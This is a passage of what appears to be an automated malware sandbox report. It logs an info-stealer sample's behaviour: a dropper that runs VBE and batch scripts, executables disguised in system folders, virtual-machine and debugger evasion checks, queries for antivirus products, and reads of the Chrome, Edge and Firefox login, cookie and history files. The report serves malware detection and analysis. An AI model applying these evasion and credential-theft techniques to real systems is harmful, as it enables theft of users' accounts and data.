              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara matchFile source: Process Memory Space: Idle.exe PID: 4476, type: MEMORYSTR
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\ProgramData\ssh\System.exeMemory allocated: 16E0000 memory reserve | memory write watchJump to behavior
              Source: C:\ProgramData\ssh\System.exeMemory allocated: 1B060000 memory reserve | memory write watchJump to behavior
              Source: C:\Recovery\Idle.exeMemory allocated: 23D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Recovery\Idle.exeMemory allocated: 1A590000 memory reserve | memory write watchJump to behavior
              Source: C:\Recovery\Idle.exeMemory allocated: A40000 memory reserve | memory write watch
              Source: C:\Recovery\Idle.exeMemory allocated: 1A400000 memory reserve | memory write watch
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeMemory allocated: AA0000 memory reserve | memory write watch
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeMemory allocated: 1A680000 memory reserve | memory write watch
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeMemory allocated: CF0000 memory reserve | memory write watch
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeMemory allocated: 1A7E0000 memory reserve | memory write watch
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BE80338 rdtsc 30_2_00007FFD9BE80338
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BA90525 sldt word ptr [eax]30_2_00007FFD9BA90525
              Source: C:\ProgramData\ssh\System.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599763Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599652Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599327Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599094Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598860Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598703Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598594Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598484Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598133Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 597996Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 597866Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 597750Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\ProgramData\ssh\System.exeWindow / User API: threadDelayed 1239Jump to behavior
              Source: C:\ProgramData\ssh\System.exeWindow / User API: threadDelayed 1033Jump to behavior
              Source: C:\Recovery\Idle.exeWindow / User API: threadDelayed 3452Jump to behavior
              Source: C:\Recovery\Idle.exeWindow / User API: threadDelayed 6054Jump to behavior
              Source: C:\Recovery\Idle.exeWindow / User API: foregroundWindowGot 1767Jump to behavior
              Source: C:\Recovery\Idle.exeWindow / User API: threadDelayed 367
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeWindow / User API: threadDelayed 366
              Source: C:\ProgramData\ssh\System.exe TID: 5800Thread sleep count: 1239 > 30Jump to behavior
              Source: C:\ProgramData\ssh\System.exe TID: 5800Thread sleep count: 1033 > 30Jump to behavior
              Source: C:\ProgramData\ssh\System.exe TID: 4080Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -25825441703193356s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599763s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599652s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599546s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599437s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599327s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599219s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599094s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -598860s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -598703s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -598594s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -598484s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -598359s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -598250s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -598133s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -597996s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -597866s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -597750s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 6560Thread sleep count: 367 > 30
              Source: C:\Recovery\Idle.exe TID: 3852Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe TID: 1612Thread sleep count: 366 > 30
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe TID: 6472Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe TID: 7068Thread sleep count: 366 > 30
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe TID: 6104Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\ProgramData\ssh\System.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Recovery\Idle.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Recovery\Idle.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000FA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_000FA5F4
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0010B8E0
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010DD72 VirtualQuery,GetSystemInfo,0_2_0010DD72
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\userJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B66B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partitioni
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002813000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Hypervisor Logical Processor
              Source: Idle.exe, 0000001E.00000002.4208170233.000000001C58D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B660000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service{
              Source: wscript.exe, 00000001.00000003.1764950335.00000000028ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B731000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Serviceta!Uu
              Source: wscript.exe, 00000001.00000003.1764950335.00000000028ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#4&
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B731000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
              Source: Idle.exe, 0000001E.00000002.4121489227.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002813000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Virtual Machine Bus Pipes
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B66B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW,{N)
              Source: Idle.exe, 0000001E.00000002.4121489227.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
              Source: Idle.exe, 0000001E.00000002.4209362462.000000001C6CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002813000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *Hyper-V Dynamic Memory Integration Service
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B66B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B66B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V niyeugtbtsajbqk Bus
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002813000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
              Source: Idle.exe, 0000001E.00000002.4121489227.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipesf
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002813000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Hypervisor Root Partition
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002813000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )Hyper-V Hypervisor Root Virtual Processor
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002813000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B66B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V niyeugtbtsajbqk Bus Pipes+
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeAPI call chain: ExitProcess graph end nodegraph_0-23587
              Source: C:\ProgramData\ssh\System.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0011866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0011866F
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0011753D mov eax, dword ptr fs:[00000030h]0_2_0011753D
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0011B710 GetProcessHeap,0_2_0011B710
              Source: C:\ProgramData\ssh\System.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Recovery\Idle.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Recovery\Idle.exeProcess token adjusted: Debug
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010F063 SetUnhandledExceptionFilter,0_2_0010F063
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0010F22B
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0010EF05
              Source: C:\ProgramData\ssh\System.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ssh\ML9lnBLRkA6sXD0.bat" "Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\ssh\System.exe "C:\\ProgramData\ssh\System.exe"Jump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess created: unknown unknownJump to behavior
              Source: Idle.exe, 0000001E.00000002.4213265360.000000001D5BB000.00000004.00000020.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4211898288.000000001D4AA000.00000004.00000020.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4211898288.000000001D4A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerh
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.00000000029FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerPq~
              Source: Idle.exe, 0000001E.00000002.4123458318.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002942000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002A05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002B72000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002B5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerPq~X
              Source: Idle.exe, 0000001E.00000002.4213265360.000000001D5BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager+
              Source: Idle.exe, 0000001E.00000002.4213265360.000000001D5BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager)
              Source: Idle.exe, 0000001E.00000002.4123458318.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002942000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002A05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerX
              Source: Idle.exe, 0000001E.00000002.4213265360.000000001D5BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager.15;%
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010ED5B cpuid 0_2_0010ED5B
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0010A63C
              Source: C:\ProgramData\ssh\System.exeQueries volume information: C:\ProgramData\ssh\System.exe VolumeInformationJump to behavior
              Source: C:\ProgramData\ssh\System.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\ProgramData\ssh\System.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Recovery\Idle.exeQueries volume information: C:\Recovery\Idle.exe VolumeInformationJump to behavior
              Source: C:\Recovery\Idle.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Recovery\Idle.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Recovery\Idle.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Recovery\Idle.exeQueries volume information: C:\Recovery\Idle.exe VolumeInformation
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeQueries volume information: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe VolumeInformation
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0010D5D4
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000FACF5 GetVersionExW,0_2_000FACF5
              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TC:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

              Stealing of Sensitive Information

              Source: Yara matchFile source: 00000022.00000002.1886936604.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000002.1893402647.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.1896236954.0000000002401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1800682479.000000000329F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.1886936604.00000000026BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000002.1893402647.000000000281D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1800682479.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1803403382.000000001306D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: System.exe PID: 3604, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Idle.exe PID: 4476, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Idle.exe PID: 2944, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: lmXqPxTfNHomnnafzTOKZnFns.exe PID: 1704, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: lmXqPxTfNHomnnafzTOKZnFns.exe PID: 5324, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Recovery\Idle.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

              Remote Access Functionality

              Source: Yara match, File source: 00000022.00000002.1886936604.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000024.00000002.1893402647.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000021.00000002.1896236954.0000000002401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.1800682479.000000000329F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000022.00000002.1886936604.00000000026BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000024.00000002.1893402647.000000000281D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.1800682479.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.1803403382.000000001306D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: System.exe PID: 3604, type: MEMORYSTR
              Source: Yara match, File source: Process Memory Space: Idle.exe PID: 4476, type: MEMORYSTR
              Source: Yara match, File source: Process Memory Space: Idle.exe PID: 2944, type: MEMORYSTR
